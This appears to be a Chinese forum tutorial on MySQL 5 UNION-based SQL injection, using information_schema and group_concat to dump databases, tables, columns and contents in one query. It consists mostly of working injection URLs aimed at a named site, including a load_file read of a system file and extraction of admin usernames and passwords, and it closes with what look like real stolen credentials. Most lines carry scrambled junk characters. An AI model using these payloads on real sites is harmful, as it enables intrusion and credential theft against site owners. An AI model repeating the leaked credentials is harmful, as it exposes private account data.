此方法只适用于Mysql 5.0以及5.0以上版本 注入方法和mysql 5 类似, r2 X4 F" ?0 ?: t% i1 C9 l
但此方法大大提高了读取数据库的速度,此方法并非本人原创,原创出处是国外某牛人
0 Y; l3 M+ q: \# ^ Q" d
+ ]" t$ n+ y1 M0 v0 F- {$ \8 P+ }, D. {) h1 V/ j- ]4 d7 O& h! c
优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入
$ r2 `' F1 m! k& L) b' U+ z6 _" U& d7 A2 q9 l! ^* l
缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢...
* V! c$ W" h" `/ C5 L
0 i* J4 p3 T6 ]$ r$ o1 n: u9 j下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示
: U& q) N a C: e; y* X! V1 @: T在注入时根据实际情况作出变化 比如过滤了空格,使用/**/ , + 等等
3 J8 A9 N$ @( U+ T$ G6 d
. N/ ^; B8 p- i2 p5 khttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17: h6 ]) U7 g: g+ B
' A3 l% ^! b' D+ w读出所有库:
0 X7 n1 _$ j* @1 r. a- Uhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA) h, j; o; q" x6 z- X. o* Z
% z$ P# | p( w) j# a2 M1 q# w1 y: f2 a
7 n, n* x( g/ h: F' z( d+ m. | m
读出所有表:5 e: b+ B! F7 H( g
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()
' J& x# c; l2 ^' `+ p
* Y, Q+ Q4 ^& k: X读出所有表字段:9 C5 R& n) O1 r0 y+ I
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)
% b3 y# p J$ d*/ (97,100,109,105,110)为admin的ascii码 依次类推
% B3 \$ ~1 T* f6 D2 N) J% H3 A, r" T1 j1 T0 k- p$ b) d9 q" R' w
读出所有表字段里的内容:
/ _8 w& \+ ~- h$ r" Chttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin
* M" W, {% E- o. [7 Z3 c& R
* K( @% F0 `+ R8 [+ m( e1 {- x' P1 p( X7 R9 n @* k, B5 s
7 C6 G: O+ G! T% [$ x2 b
; O3 ]* G5 j% V& o% f
' J9 c, e2 z H) l! u: J
$ P" b! u" { |( _) ~$ M, `
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),load_file(CHAR(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%23
4 {* h5 G7 n s: h% Y! T# _3 O+ w: Z! ]0 i" ^. l
! N8 h/ ?1 Z% M9 _. f" o* x: P
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%23
1 j& a) Z. w* Y
' {, n6 ^: Z3 ~ ?- Whttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%23
R( k* g# z/ A$ u- D& g8 D/ {+ T$ ~' e) {+ E( m3 D
' s5 y" c2 a. Vhttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%23
; g+ Q t' B6 q
/ H5 A5 Q" [: _5 T. r" E m* O5 W2 G) o' A4 M7 y* F9 \. L
webmaster:dzb521123,simlab:simadmin200432336 x; V5 f+ ] I' x; T4 {" `
|